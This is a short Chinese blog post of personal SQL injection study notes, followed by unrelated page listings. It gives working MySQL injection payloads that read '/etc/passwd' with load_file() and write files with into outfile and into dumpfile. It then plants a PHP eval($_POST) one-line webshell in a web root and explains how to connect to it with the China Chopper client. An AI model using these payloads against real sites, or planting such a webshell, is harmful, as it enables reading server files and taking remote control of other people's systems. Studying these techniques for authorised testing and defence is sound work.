sql注入笔记2

最新推荐文章于 2024-08-06 03:48:52 发布
最新推荐文章于 2024-08-06 03:48:52 发布
阅读量139 收藏
点赞数
分类专栏: 渗透笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/118074193
版权

load_file()函数 读文件操作
前提:
知道文件绝对路径
能够使用union查询
对web目录有写权限
union select 1,load_file(’/etc/passwd’),3,4,5,6#
union select 1,load_file(如果引号被过滤可以用16进制),3,4,5,6#

into outfile()写文件操作
前提:
文件名必须全路径(绝对路径)
用户必须有写文件的权限
没有对’引号过滤
select ‘<?php phpinfo?>’ into outfile ‘绝对路径’
select ‘12345’ into outfile ‘d:/2.txt’

into dumpfile()写文件操作 支持二进制读写
select ‘12345’ into dumpfile ‘d:/3.txt’

select ‘<?php eval($_POST[1]);?>’ into outfile ‘d:/phpstudy/www/1.php’
在目录d:/phpstudy/www/下新建一个1.php文件内容是<?php eval($_POST[1]);?>

写入一句话木马
_post接收post传来的1的参数
eval()函数 把当前字符串内容当成php代码来执行
通过POST方式在网页中把自己写的代码赋值给1,然后$_POST函数接收1的值,再通过eval函数就执行自己传送的代码了

union select 1,2,3,4,’<?php eval($_POST[name])?>’,6,7 into outfile ‘D:\phpstudy\www\1.php’

union select 1,2,3,4,load_file(‘D:\phpstudy\www\1.php’),6,7

通过中国菜刀连接

深白色耳机
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
phpmyadmin页面getshell
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
04-03 471
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法。
sqli-labs Less-7(SQL注入文件读写)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-04 369
在使用sqli-labs Less-7测试的时候一直有问题,无奈改用Less-1 winserver的iis默认路径c:\Inetpub\wwwroot linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等 apache 就…/var/www/htm,…/var/www/html/htdocs phpstudy 就是…\PhpStudy20180211\PHPTutorial\WWW
php代码审计【9】SQL 注入研究
司徒荆的博客
06-27 1162
https://www.cnblogs.com/shellr00t/p/5701184.html参考
SQL 注入笔记
qq_32812063的博客
11-23 1341
sql注入笔记
SQL注入学习笔记
Dasdwer的博客
03-27 334
必要知识:在MySql5.0以上版本中,MySQL存在一个自带数据库名为information_schema,他是一个存储记录所有数据库名,表名,列名的数据库,也相当于可以通过查询他获取指定数据库下面的表名或列名信息。一般select 有回显,insert,update,delete等无回显,需要用到报错盲注(一般使用报错回显,效率最高)sqlmap,超级sql注入工具咋用的,怎么去获取数据库,读表,查数据 ,os-shell。报错显示,遗留文件,漏洞报错,平台配置文件,爆破(网站常见路径)等。
SQL注入问题 随手笔记
qq_66228897的博客
07-09 204
就是在用户可填写的内容中包含了可以运行的SQL片段或语句,这样的SQL片段或语句是可以改变原有SQL的执行语义,从而执行出与原有SQL相违背的结果!因此这个过程就被称为SQL注入过程,出现的结果被称之为SQL注入问题。
sql注入学习笔记
山月不问人间事
08-06 722
注入攻击:注入攻击的本质,是把用户输入的数据当做代码执行,或者生成其他语义的内容。因此注入攻击有两个关键条件:1.用户能够控制输入 2.原本要执行的代码块拼接用户的数据。Sql注入:SQLI,sql injection,我们称之为sql注入。何为sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL ,Oracle以及Postgresql。Sql语言就是我们在管理数据库时用到的一种。
SQL注入漏洞学习笔记1
lilcur的博客
12-24 959
SQL注入漏洞入门学习
sql注入 学习笔记
weixin_45568648的博客
10-05 2833
自学sql注入
时序预测-基于自回归滑动平均模型时间序列ARIMA预测Matlab程序 点变量
08-30
时序预测|基于自回归滑动平均模型时间序列ARIMA预测Matlab程序 点变量 1.程序功能已完成调试,用户可以通过一键操作生成图形和评价指标。 2.数据输入以Excel格式保存,只需更换文件,即可运行以获得个人化的实验结果。 3.代码中包含详细注释,具有较强的可读性,特别适合初学者和新手。 4.在实际数据集上的效果可能较差,需要对模型参数进行微调。 CSDN:机器不会学习CL 时序预测|基于自回归滑动平均模型时间序列ARIMA预测Matlab程序 点变量 1.程序功能已完成调试,用户可以通过一键操作生成图形和评价指标。 2.数据输入以Excel格式保存,只需更换文件,即可运行以获得个人化的实验结果。 3.代码中包含详细注释,具有较强的可读性,特别适合初学者和新手。 4.在实际数据集上的效果可能较差,需要对模型参数进行微调。 CSDN:机器不会学习CL
基于微信小程序的考研资料分享系统的设计与实现.docx
08-30
基于微信小程序的考研资料分享系统的设计与实现.docx
豆瓣读书书评爬虫软件,使用方便快捷
08-30
豆瓣读书书评爬虫软件将辅助你爬取你感兴趣的书目短评,交互简单,你可以轻松的获取目标书目的指定页数的内容,你可以非常方便地使用该资源即可爬取对应书目的短评内容,可以爬取指定页数的信息,也可以将内容保存到数据库sqlite中,当然也会保存为文本文件,每条评论独占一行,如果后续你要做评论的文本情感分析也会特别方便,如若不会使用,详细使用方式可以看我写的一篇文章,链接在此处,点击可跳转:https://blog.csdn.net/weixin_45938063/article/details/141500999spm=1001.2014.3001.5501 ,该资源收取1积分即可下载,欢迎支持下载,您的支持是我创作的动力
XX市XX区市场局数据治理方案文档
08-30
基于企业监管、食品安全、药品安全、知识产权、特种设备监管等多维数据,通过协同各类数据资源,进行数据汇集、治理,构建支撑XX市XX区市场监管数字化平台的标准化数据库,促进XX市XX区市场监管体系的放管服改革工作,逐步实现XX市XX区全方位、全覆盖、全领域、全过程的一体化数智监管体系。
基于springboot的网上购物商城系统设计与实现.docx
最新发布
08-30
基于springboot的网上购物商城系统设计与实现.docx
ssm+mysql的宝康药房销售管理系统.zip
08-30
根据需求,确定系统采用JSP技术,SSM框架,JAVA作为编程语言,MySQL作为数据库。整个系统要操作方便、易于维护、灵活实用。主要实现了频道维护、新闻维护、药品维护、订单维护、系统管理等功能。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值